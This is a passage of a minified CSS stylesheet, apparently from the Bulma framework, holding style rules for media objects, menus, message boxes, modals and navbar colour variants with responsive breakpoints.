rgba(219,219,219,.5);margin-top:1rem;padding-top:1rem}.media.is-large+.media{margin-top:1.5rem;padding-top:1.5rem}.media-left,.media-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.media-left{margin-right:1rem}.media-right{margin-left:1rem}.media-content{flex-basis:auto;flex-grow:1;flex-shrink:1;text-align:inherit}@media screen and (max-width: 768px){.media-content{overflow-x:auto}}.menu{font-size:1rem}.menu.is-small{font-size:.75rem}.menu.is-medium{font-size:1.25rem}.menu.is-large{font-size:1.5rem}.menu-list{line-height:1.25}.menu-list a{border-radius:2px;color:#4a4a4a;display:block;padding:.5em .75em}.menu-list a:hover{background-color:#f5f5f5;color:#363636}.menu-list a.is-active{background-color:#485fc7;color:#fff}.menu-list li ul{border-left:1px solid #dbdbdb;margin:.75em;padding-left:.75em}.menu-label{color:#7a7a7a;font-size:.75em;letter-spacing:.1em;text-transform:uppercase}.menu-label:not(:first-child){margin-top:1em}.menu-label:not(:last-child){margin-bottom:1em}.message{background-color:#f5f5f5;border-radius:4px;font-size:1rem}.message strong{color:currentColor}.message a:not(.button):not(.tag):not(.dropdown-item){color:currentColor;text-decoration:underline}.message.is-small{font-size:.75rem}.message.is-medium{font-size:1.25rem}.message.is-large{font-size:1.5rem}.message.is-white{background-color:#fff}.message.is-white .message-header{background-color:#fff;color:#0a0a0a}.message.is-white .message-body{border-color:#fff}.message.is-black{background-color:#fafafa}.message.is-black .message-header{background-color:#0a0a0a;color:#fff}.message.is-black .message-body{border-color:#0a0a0a}.message.is-light{background-color:#fafafa}.message.is-light .message-header{background-color:#f5f5f5;color:#000000b3}.message.is-light .message-body{border-color:#f5f5f5}.message.is-dark{background-color:#fafafa}.message.is-dark .message-header{background-color:#363636;color:#fff}.message.is-dark .message-body{border-color:#363636}.message.is-primary{background-color:#ebfffc}.message.is-primary .message-header{background-color:#00d1b2;color:#fff}.message.is-primary .message-body{border-color:#00d1b2;color:#00947e}.message.is-link{background-color:#eff1fa}.message.is-link .message-header{background-color:#485fc7;color:#fff}.message.is-link .message-body{border-color:#485fc7;color:#3850b7}.message.is-info{background-color:#eff5fb}.message.is-info .message-header{background-color:#3e8ed0;color:#fff}.message.is-info .message-body{border-color:#3e8ed0;color:#296fa8}.message.is-success{background-color:#effaf5}.message.is-success .message-header{background-color:#48c78e;color:#fff}.message.is-success .message-body{border-color:#48c78e;color:#257953}.message.is-warning{background-color:#fffaeb}.message.is-warning .message-header{background-color:#ffe08a;color:#000000b3}.message.is-warning .message-body{border-color:#ffe08a;color:#946c00}.message.is-danger{background-color:#feecf0}.message.is-danger .message-header{background-color:#f14668;color:#fff}.message.is-danger .message-body{border-color:#f14668;color:#cc0f35}.message-header{align-items:center;background-color:#4a4a4a;border-radius:4px 4px 0 0;color:#fff;display:flex;font-weight:700;justify-content:space-between;line-height:1.25;padding:.75em 1em;position:relative}.message-header .delete{flex-grow:0;flex-shrink:0;margin-left:.75em}.message-header+.message-body{border-width:0;border-top-left-radius:0;border-top-right-radius:0}.message-body{border-color:#dbdbdb;border-radius:4px;border-style:solid;border-width:0 0 0 4px;color:#4a4a4a;padding:1.25em 1.5em}.message-body code,.message-body pre{background-color:#fff}.message-body pre code{background-color:transparent}.modal{align-items:center;display:none;flex-direction:column;justify-content:center;overflow:hidden;position:fixed;z-index:40}.modal.is-active{display:flex}.modal-background{background-color:#0a0a0adb}.modal-content,.modal-card{margin:0 20px;max-height:calc(100vh - 160px);overflow:auto;position:relative;width:100%}@media screen and (min-width: 769px){.modal-content,.modal-card{margin:0 auto;max-height:calc(100vh - 40px);width:640px}}.modal-close{background:none;height:40px;position:fixed;right:20px;top:20px;width:40px}.modal-card{display:flex;flex-direction:column;max-height:calc(100vh - 40px);overflow:hidden;-ms-overflow-y:visible}.modal-card-head,.modal-card-foot{align-items:center;background-color:#f5f5f5;display:flex;flex-shrink:0;justify-content:flex-start;padding:20px;position:relative}.modal-card-head{border-bottom:1px solid #dbdbdb;border-top-left-radius:6px;border-top-right-radius:6px}.modal-card-title{color:#363636;flex-grow:1;flex-shrink:0;font-size:1.5rem;line-height:1}.modal-card-foot{border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:1px solid #dbdbdb}.modal-card-foot .button:not(:last-child){margin-right:.5em}.modal-card-body{-webkit-overflow-scrolling:touch;background-color:#fff;flex-grow:1;flex-shrink:1;overflow:auto;padding:20px}.navbar{background-color:#fff;min-height:3.25rem;position:relative;z-index:30}.navbar.is-white{background-color:#fff;color:#0a0a0a}.navbar.is-white .navbar-brand>.navbar-item,.navbar.is-white .navbar-brand .navbar-link{color:#0a0a0a}.navbar.is-white .navbar-brand>a.navbar-item:focus,.navbar.is-white .navbar-brand>a.navbar-item:hover,.navbar.is-white .navbar-brand>a.navbar-item.is-active,.navbar.is-white .navbar-brand .navbar-link:focus,.navbar.is-white .navbar-brand .navbar-link:hover,.navbar.is-white .navbar-brand .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link:after{border-color:#0a0a0a}.navbar.is-white .navbar-burger{color:#0a0a0a}@media screen and (min-width: 1024px){.navbar.is-white .navbar-start>.navbar-item,.navbar.is-white .navbar-start .navbar-link,.navbar.is-white .navbar-end>.navbar-item,.navbar.is-white .navbar-end .navbar-link{color:#0a0a0a}.navbar.is-white .navbar-start>a.navbar-item:focus,.navbar.is-white .navbar-start>a.navbar-item:hover,.navbar.is-white .navbar-start>a.navbar-item.is-active,.navbar.is-white .navbar-start .navbar-link:focus,.navbar.is-white .navbar-start .navbar-link:hover,.navbar.is-white .navbar-start .navbar-link.is-active,.navbar.is-white .navbar-end>a.navbar-item:focus,.navbar.is-white .navbar-end>a.navbar-item:hover,.navbar.is-white .navbar-end>a.navbar-item.is-active,.navbar.is-white .navbar-end .navbar-link:focus,.navbar.is-white .navbar-end .navbar-link:hover,.navbar.is-white .navbar-end .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-start .navbar-link:after,.navbar.is-white .navbar-end .navbar-link:after{border-color:#0a0a0a}.navbar.is-white .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-white .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-white .navbar-item.has-dropdown.is-active .navbar-link{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-dropdown a.navbar-item.is-active{background-color:#fff;color:#0a0a0a}}.navbar.is-black{background-color:#0a0a0a;color:#fff}.navbar.is-black .navbar-brand>.navbar-item,.navbar.is-black .navbar-brand .navbar-link{color:#fff}.navbar.is-black .navbar-brand>a.navbar-item:focus,.navbar.is-black .navbar-brand>a.navbar-item:hover,.navbar.is-black .navbar-brand>a.navbar-item.is-active,.navbar.is-black .navbar-brand .navbar-link:focus,.navbar.is-black .navbar-brand .navbar-link:hover,.navbar.is-black .navbar-brand .navbar-link.is-active{background-color:#000;color:#fff}.navbar.is-black .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-black .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-black .navbar-start>.navbar-item,.navbar.is-black .navbar-start .navbar-link,.navbar.is-black .navbar-end>.navbar-item,.navbar.is-black .navbar-end .navbar-link{color:#fff}.navbar.is-black .navbar-start>a.navbar-item:focus,.navbar.is-black .navbar-start>a.navbar-item:hover,.navbar.is-black .navbar-start>a.navbar-item.is-active,.navbar.is-black .navbar-start .navbar-link:focus,.navbar.is-black .navbar-start .navbar-link:hover,.navbar.is-black .navbar-start .navbar-link.is-active,.navbar.is-black .navbar-end>a.navbar-item:focus,.navbar.is-black .navbar-end>a.navbar-item:hover,.navbar.is-black .navbar-end>a.navbar-item.is-active,.navbar.is-black .navbar-end .navbar-link:focus,.navbar.is-black .navbar-end .navbar-link:hover,.navbar.is-black .navbar-end .navbar-link.is-active{background-color:#000;color:#fff}.navbar.is-black .navbar-start .navbar-link:after,.navbar.is-black .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-black .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-black .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-black .navbar-item.has-dropdown.is-active .navbar-link{background-color:#000;color:#fff}.navbar.is-black .navbar-dropdown a.navbar-item.is-active{background-color:#0a0a0a;color:#fff}}.navbar.is-light{background-color:#f5f5f5;color:#000000b3}.navbar.is-light .navbar-brand>.navbar-item,.navbar.is-light .navbar-brand .navbar-link{color:#000000b3}.navbar.is-light .navbar-brand>a.navbar-item:focus,.navbar.is-light .navbar-brand>a.navbar-item:hover,.navbar.is-light .navbar-brand>a.navbar-item.is-active,.navbar.is-light .navbar-brand .navbar-link:focus,.navbar.is-light .navbar-brand .navbar-link:hover,.navbar.is-light .navbar-brand .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-brand .navbar-link:after{border-color:#000000b3}.navbar.is-light .navbar-burger{color:#000000b3}@media screen and (min-width: 1024px){.navbar.is-light .navbar-start>.navbar-item,.navbar.is-light .navbar-start .navbar-link,.navbar.is-light .navbar-end>.navbar-item,.navbar.is-light .navbar-end .navbar-link{color:#000000b3}.navbar.is-light .navbar-start>a.navbar-item:focus,.navbar.is-light .navbar-start>a.navbar-item:hover,.navbar.is-light .navbar-start>a.navbar-item.is-active,.navbar.is-light .navbar-start .navbar-link:focus,.navbar.is-light .navbar-start .navbar-link:hover,.navbar.is-light .navbar-start .navbar-link.is-active,.navbar.is-light .navbar-end>a.navbar-item:focus,.navbar.is-light .navbar-end>a.navbar-item:hover,.navbar.is-light .navbar-end>a.navbar-item.is-active,.navbar.is-light .navbar-end .navbar-link:focus,.navbar.is-light .navbar-end .navbar-link:hover,.navbar.is-light .navbar-end .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-start .navbar-link:after,.navbar.is-light .navbar-end .navbar-link:after{border-color:#000000b3}.navbar.is-light .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-light .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-light .navbar-item.has-dropdown.is-active .navbar-link{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#000000b3}}.navbar.is-dark{background-color:#363636;color:#fff}.navbar.is-dark .navbar-brand>.navbar-item,.navbar.is-dark .navbar-brand .navbar-link{color:#fff}.navbar.is-dark .navbar-brand>a.navbar-item:focus,.navbar.is-dark .navbar-brand>a.navbar-item:hover,.navbar.is-dark .navbar-brand>a.navbar-item.is-active,.navbar.is-dark .navbar-brand .navbar-link:focus,.navbar.is-dark .navbar-brand .navbar-link:hover,.navbar.is-dark .navbar-brand .navbar-link.is-active{background-color:#292929;color:#fff}.navbar.is-dark .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-dark .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-dark .navbar-start>.navbar-item,.navbar.is-dark .navbar-start .navbar-link,.navbar.is-dark .navbar-end>.navbar-item,.navbar.is-dark .navbar-end .navbar-link{color:#fff}.navbar.is-dark .navbar-start>a.navbar-item:focus,.navbar.is-dark .navbar-start>a.navbar-item:hover,.navbar.is-dark .navbar-start>a.navbar-item.is-active,.navbar.is-dark .navbar-start .navbar-link:focus,.navbar.is-dark .navbar-start .navbar-link:hover,.navbar.is-dark .navbar-start .navbar-link.is-active,.navbar.is-dark .navbar-end>a.navbar-item:focus,.navbar.is-dark .navbar-end>a.navbar-item:hover,.navbar.is-dark .navbar-end>a.navbar-item.is-active,.navbar.is-dark .navbar-end .navbar-link:focus,.navbar.is-dark .navbar-end .navbar-link:hover,.navbar.is-dark .navbar-end .navbar-link.is-active{background-color:#292929;color:#fff}.navbar.is-dark .navbar-start .navbar-link:after,.navbar.is-dark .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-dark .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-dark .navbar-item.has-dropdown.is-active .navbar-link{background-color:#292929;color:#fff}.navbar.is-dark .navbar-dropdown a.navbar-item.is-active{background-color:#363636;color:#fff}}.navbar.is-primary{background-color:#00d1b2;color:#fff}.navbar.is-primary .navbar-brand>.navbar-item,.navbar.is-primary .navbar-brand .navbar-link{color:#fff}.navbar.is-primary .navbar-brand>a.navbar-item:focus,.navbar.is-primary .navbar-brand>a.navbar-item:hover,.navbar.is-primary .navbar-brand>a.navbar-item.is-active,.navbar.is-primary .navbar-brand .navbar-link:focus,.navbar.is-primary .navbar-brand .navbar-link:hover,.navbar.is-primary .navbar-brand .navbar-link.is-active{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-primary .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-primary .navbar-start>.navbar-item,.navbar.is-primary .navbar-start .navbar-link,.navbar.is-primary .navbar-end>.navbar-item,.navbar.is-primary .navbar-end .navbar-link{color:#fff}.navbar.is-primary .navbar-start>a.navbar-item:focus,.navbar.is-primary .navbar-start>a.navbar-item:hover,.navbar.is-primary .navbar-start>a.navbar-item.is-active,.navbar.is-primary .navbar-start .navbar-link:focus,.navbar.is-primary .navbar-start .navbar-link:hover,.navbar.is-primary .navbar-start .navbar-link.is-active,.navbar.is-primary .navbar-end>a.navbar-item:focus,.navbar.is-primary .navbar-end>a.navbar-item:hover,.navbar.is-primary .navbar-end>a.navbar-item.is-active,.navbar.is-primary .navbar-end .navbar-link:focus,.navbar.is-primary .navbar-end .navbar-link:hover,.navbar.is-primary .navbar-end .navbar-link.is-active{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-start .navbar-link:after,.navbar.is-primary .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-primary .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-primary .navbar-item.has-dropdown.is-active .navbar-link{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-dropdown a.navbar-item.is-active{background-color:#00d1b2;color:#fff}}.navbar.is-link{background-color:#485fc7;color:#fff}.navbar.is-link .navbar-brand>.navbar-item,.navbar.is-link .navbar-brand .navbar-link{color:#fff}.navbar.is-link .navbar-brand>a.navbar-item:focus,.navbar.is-link .navbar-brand>a.navbar-item:hover,.navbar.is-link .navbar-brand>a.navbar-item.is-active,.navbar.is-link .navbar-brand .navbar-link:focus,.navbar.is-link .navbar-brand .navbar-link:hover,.navbar.is-link .navbar-brand .navbar-link.is-active{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-link .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-link .navbar-start>.navbar-item,.navbar.is-link .navbar-start .navbar-link,.navbar.is-link .navbar-end>.navbar-item,.navbar.is-link .navbar-end .navbar-link{color:#fff}.navbar.is-link .navbar-start>a.navbar-item:focus,.navbar.is-link .navbar-start>a.navbar-item:hover,.navbar.is-link .navbar-start>a.navbar-item.is-active,.navbar.is-link .navbar-start .navbar-link:focus,.navbar.is-link .navbar-start .navbar-link:hover,.navbar.is-link .navbar-start .navbar-link.is-active,.navbar.is-link .navbar-end>a.navbar-item:focus,.navbar.is-link .navbar-end>a.navbar-item:hover,.navbar.is-link .navbar-end>a.navbar-item.is-active,.navbar.is-link .navbar-end .navbar-link:focus,.navbar.is-link .navbar-end .navbar-link:hover,.navbar.is-link .navbar-end .navbar-link.is-active{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-start .navbar-link:after,.navbar.is-link .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-link .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-link .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-link .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-dropdown a.navbar-item.is-active{background-color:#485fc7;color:#fff}}.navbar.is-info{background-color:#3e8ed0;color:#fff}.navbar.is-info .navbar-brand>.navbar-item,.navbar.is-info .navbar-brand .navbar-link{color:#fff}.navbar.is-info .navbar-brand>a.navbar-item:focus,.navbar.is-info .navbar-brand>a.navbar-item:hover,.navbar.is-info .navbar-brand>a.navbar-item.is-active,.navbar.is-info .navbar-brand .navbar-link:focus,.navbar.is-info .navbar-brand .navbar-link:hover,.navbar.is-info .navbar-brand .navbar-link.is-active{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-info .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-info .navbar-start>.navbar-item,.navbar.is-info .navbar-start .navbar-link,.navbar.is-info .navbar-end>.navbar-item,.navbar.is-info .navbar-end .navbar-link{color:#fff}.navbar.is-info .navbar-start>a.navbar-item:focus,.navbar.is-info .navbar-start>a.navbar-item:hover,.navbar.is-info .navbar-start>a.navbar-item.is-active,.navbar.is-info .navbar-start .navbar-link:focus,.navbar.is-info .navbar-start .navbar-link:hover,.navbar.is-info .navbar-start .navbar-link.is-active,.navbar.is-info .navbar-end>a.navbar-item:focus,.navbar.is-info .navbar-end>a.navbar-item:hover,.navbar.is-info .navbar-end>a.navbar-item.is-active,.navbar.is-info .navbar-end .navbar-link:focus,.navbar.is-info .navbar-end .navbar-link:hover,.navbar.is-info .navbar-end .navbar-link.is-active{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-start .navbar-link:after,.navbar.is-info .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-info .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-info .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-info .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-dropdown a.navbar-item.is-active{background-color:#3e8ed0;color:#fff}}.navbar.is-success{background-color:#48c78e;color:#fff}.navbar.is-success .navbar-brand>.navbar-item,.navbar.is-success .navbar-brand .navbar-link{color:#fff}.navbar.is-success .navbar-brand>a.navbar-item:focus,.navbar.is-success .navbar-brand>a.navbar-item:hover,.navbar.is-success .navbar-brand>a.navbar-item.is-active,.navbar.is-success .navbar-brand .navbar-link:focus,.navbar.is-success .navbar-brand .navbar-link:hover,.navbar.is-success .navbar-brand .navbar-link.is-active{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-success .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-success .navbar-start>.navbar-item,.navbar.is-success .navbar-start .navbar-link,.navbar.is-success .navbar-end>.navbar-item,.navbar.is-success .navbar-end .navbar-link{color:#fff}.navbar.is-success .navbar-start>a.navbar-item:focus,.navbar.is-success .navbar-start>a.navbar-item:hover,.navbar.is-success .navbar-start>a.navbar-item.is-active,.navbar.is-success .navbar-start .navbar-link:focus,.navbar.is-success .navbar-start .navbar-link:hover,.navbar.is-success .navbar-start .navbar-link.is-active,.navbar.is-success .navbar-end>a.navbar-item:focus,.navbar.is-success .navbar-end>a.navbar-item:hover,.navbar.is-success .navbar-end>a.navbar-item.is-active,.navbar.is-success .navbar-end .navbar-link:focus,.navbar.is-success .navbar-end .navbar-link:hover,.navbar.is-success .navbar-end .navbar-link.is-active{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-start .navbar-link:after,.navbar.is-success .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-success .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-success .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-success .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-dropdown a.navbar-item.is-active{background-color:#48c78e;color:#fff}}.navbar.is-warning{background-color:#ffe08a;color:#000000b3}.navbar.is-warning .navbar-brand>.navbar-item,.navbar.is-warning .navbar-brand .navbar-link{color:#000000b3}.navbar.is-warning .navbar-brand>a.navbar-item:focus,.navbar.is-warning .navbar-brand>a.navbar-item:hover,.navbar.is-warning .navbar-brand>a.navbar-item.is-active,.navbar.is-warning .navbar-brand .navbar-link:focus,.navbar.is-warning .navbar-brand .navbar-link:hover,.navbar.is-warning .navbar-brand .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-brand .navbar-link:after{border-color:#000000b3}.navbar.is-warning .navbar-burger{color:#000000b3}@media screen and (min-width: 1024px){.navbar.is-warning .navbar-start>.navbar-item,.navbar.is-warning .navbar-start .navbar-link,.navbar.is-warning .navbar-end>.navbar-item,.navbar.is-warning .navbar-end .navbar-link{color:#000000b3}.navbar.is-warning .navbar-start>a.navbar-item:focus,.navbar.is-warning .navbar-start>a.navbar-item:hover,.navbar.is-warning .navbar-start>a.navbar-item.is-active,.navbar.is-warning .navbar-start .navbar-link:focus,.navbar.is-warning .navbar-start .navbar-link:hover,.navbar.is-warning .navbar-start .navbar-link.is-active,.navbar.is-warning .navbar-end>a.navbar-item:focus,.navbar.is-warning .navbar-end>a.navbar-item:hover,.navbar.is-warning .navbar-end>a.navbar-item.is-active,.navbar.is-warning .navbar-end .navbar-link:focus,.navbar.is-warning .navbar-end .navbar-link:hover,.navbar.is-warning .navbar-end .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-start .navbar-link:after,.navbar.is-warning .navbar-end .navbar-link:after{border-color:#000000b3}.navbar.is-warning .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-warning .navbar-item.has-dropdown.is-active .navbar-link{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-dropdown a.navbar-item.is-active{background-color:#ffe08a;color:#000000b3}}.navbar.is-danger{background-color:#f14668;color:#fff}.navbar.is-danger .navbar-brand>.navbar-item,.navbar.is-danger .navbar-brand .navbar-link{color:#fff}.navbar.is-danger .navbar-brand>a.navbar-item:focus,.navbar.is-danger .navbar-brand>a.navbar-item:hover,.navbar.is-danger .navbar-brand>a.navbar-item.is-active,.navbar.is-danger .navbar-brand .navbar-link:focus,.navbar.is-danger .navbar-brand .navbar-link:hover,.navbar.is-danger .navbar-brand .navbar-link.is-active{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-danger .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-danger .navbar-start>.navbar-item,.navbar.is-danger .navbar-start .navbar-link,.navbar.is-danger .navbar-end>.navbar-item,.navbar.is-danger .navbar-end .navbar-link{color:#fff}.navbar.is-danger .navbar-start>a.navbar-item:focus,.navbar.is-danger .navbar-start>a.navbar-item:hover,.navbar.is-danger .navbar-start>a.navbar-item.is-active,.navbar.is-danger .navbar-start .navbar-link:focus,.navbar.is-danger .navbar-start .navbar-link:hover,.navbar.is-danger .navbar-start .navbar-link.is-active,.navbar.is-danger .navbar-end>a.navbar-item:focus,.navbar.is-danger .navbar-end>a.navbar-item:hover,.navbar.is-danger .navbar-end>a.navbar-item.is-active,.navbar.is-danger .navbar-end .navbar-link:focus,.navbar.is-danger .navbar-end .navbar-link:hover,.navbar.is-danger .navbar-end .navbar-link.is-active{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-start .navbar-link:after,.navbar.is-danger .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-danger .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-danger .navbar-item.has-dropdown.is-active .navbar-link{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-dropdown a.navbar-item.is-active{background-color:#f14668;color:#fff}}.navbar>.container{align-items:stretch;display:flex;min-height:3.25rem;width:100%}.navbar.has-shadow{box-shadow:0 2px #f5f5f5}.navbar.is-fixed-bottom,.navbar.is-fixed-top{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom{bottom:0}.navbar.is-fixed-bottom.has-shadow{box-shadow:0 -2px #f5f5f5}.navbar.is-fixed-top{top:0}html.has-navbar-fixed-top,body.has-navbar-fixed-top{padding-top:3.25rem}html.has-navbar-fixed-bottom,body.has-navbar-fixed-bottom{padding-bottom:3.25rem}.navbar-brand,.navbar-tabs{align-items:stretch;display:flex;flex-shrink:0;min-height:3.25rem}.navbar-brand a.navbar-item:focus,.navbar-brand a.navbar-item:hover{background-color:transparent}.navbar-tabs{-webkit-overflow-scrolling:touch;max-width:100vw;overflow-x:auto;overflow-y:hidden}.navbar-burger{color:#4a4a4a;-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;cursor:pointer;display:block;height:3.25rem;position:relative;width:3.25rem;margin-left:auto}.navbar-burger span{background-color:currentColor;display:block;height:1px;left:calc(50% - 8px);position:absolute;transform-origin:center;transition-duration:86ms;transition-property:background-color,opacity,transform;transition-timing-function:ease-out;width:16px}.navbar-burger span:nth-child(1){top:calc(50% - 6px)}.navbar-burger span:nth-child(2){top:calc(50% - 1px)}.navbar-burger span:nth-child(3){top:calc(50% + 4px)}.navbar-burger:hover{background-color:#0000000d}.navbar-burger.is-active span:nth-child(1){transform:translateY(5px) rotate(45deg)}.navbar-burger.is-active span:nth-child(2){opacity:0}.navbar-burger.is-active span:nth-child(3){transform:translateY(-5px) rotate(-45deg)}.navbar-menu{display:none}.navbar-item,.navbar-link{color:#4a4a4a;display:block;line-height:1.5;padding:.5rem .75rem;position:relative}.navbar-item .icon:only-child,.navbar-link .icon:only-child{margin-left:-.25rem;margin-right:-.25rem}a.navbar-item,.navbar-link{cursor:pointer}a.navbar-item:focus,a.navbar-item:focus-within,a.navbar-item:hover,a.navbar-item.is-active,.navbar-link:focus,.navbar-link:focus-within,.navbar-link:hover,.navbar-link.is-active{background-color:#fafafa;color:#485fc7}.navbar-item{flex-grow:0;flex-shrink:0}.navbar-item img{max-height:1.75rem}.navbar-item.has-dropdown{padding:0}.navbar-item.is-expanded{flex-grow:1;flex-shrink:1}.navbar-item.is-tab{border-bottom:1px solid transparent;min-height:3.25rem;padding-bottom:calc(.5rem - 1px)}.navbar-item.is-tab:focus,.navbar-item.is-tab:hover{background-color:transparent;border-bottom-color:#485fc7}.navbar-item.is-tab.is-active{background-color:transparent;border-bottom-color:#485fc7;border-bottom-style:solid;border-bottom-width:3px;color:#485fc7;padding-bottom:calc(.5rem - 3px)}.navbar-content{flex-grow:1;flex-shrink:1}.navbar-link:not(.is-arrowless){padding-right:2.5em}.navbar-link:not(.is-arrowless):after{border-color:#485fc7;margin-top:-.375em;right:1.125em}.navbar-dropdown{font-size:.875rem;padding-bottom:.5rem;padding-top:.5rem}.navbar-dropdown .navbar-item{padding-left:1.5rem;padding-right:1.5rem}.navbar-divider{background-color:#f5f5f5;border:none;display:none;height:2px;margin:.5rem 0}@media screen and (max-width: 1023px){.navbar>.container{display:block}.navbar-brand .navbar-item,.navbar-tabs .navbar-item{align-items:center;display:flex}.navbar-link:after{display:none}.navbar-menu{background-color:#fff;box-shadow:0 8px 16px #0a0a0a1a;padding:.5rem 0}.navbar-menu.is-active{display:block}.navbar.is-fixed-bottom-touch,.navbar.is-fixed-top-touch{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-touch{bottom:0}.navbar.is-fixed-bottom-touch.has-shadow{box-shadow:0 -2px 3px #0a0a0a1a}.navbar.is-fixed-top-touch{top:0}.navbar.is-fixed-top .navbar-menu,.navbar.is-fixed-top-touch .navbar-menu{-webkit-overflow-scrolling:touch;max-height:calc(100vh - 3.25rem);overflow:auto}html.has-navbar-fixed-top-touch,body.has-navbar-fixed-top-touch{padding-top:3.25rem}html.has-navbar-fixed-bottom-touch,body.has-navbar-fixed-bottom-touch{padding-bottom:3.25rem}}@media screen and (min-width: 1024px){.navbar,.navbar-menu,.navbar-start,.navbar-end{align-items:stretch;display:flex}.navbar{min-height:3.25rem}.navbar.is-spaced{padding:1rem 2rem}.navbar.is-spaced .navbar-start,.navbar.is-spaced .navbar-end{align-items:center}.navbar.is-spaced a.navbar-item,.navbar.is-spaced .navbar-link{border-radius:4px}.navbar.is-transparent a.navbar-item:focus,.navbar.is-transparent a.navbar-item:hover,.navbar.is-transparent a.navbar-item.is-active,.navbar.is-transparent .navbar-link:focus,.navbar.is-transparent .navbar-link:hover,.navbar.is-transparent .navbar-link.is-active{background-color:transparent!important}.navbar.is-transparent .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus-within .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:hover .navbar-link{background-color:transparent!important}.navbar.is-transparent .navbar-dropdown a.navbar-item:focus,.navbar.is-transparent .navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar.is-transparent .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar-burger{display:none}.navbar-item,.navbar-link{align-items:center;display:flex}.navbar-item.has-dropdown{align-items:stretch}.navbar-item.has-dropdown-up .navbar-link:after{transform:rotate(135deg) translate(.25em,-.25em)}.navbar-item.has-dropdown-up .navbar-dropdown{border-bottom:2px solid #dbdbdb;border-radius:6px 6px 0 0;border-top:none;bottom:100%;box-shadow:0 -8px 8px #0a0a0a1a;top:auto}.navbar-item.is-active .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown{display:block}.navbar.is-spaced .navbar-item.is-active .navbar-dropdown,.navbar-item.is-active .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:focus-within 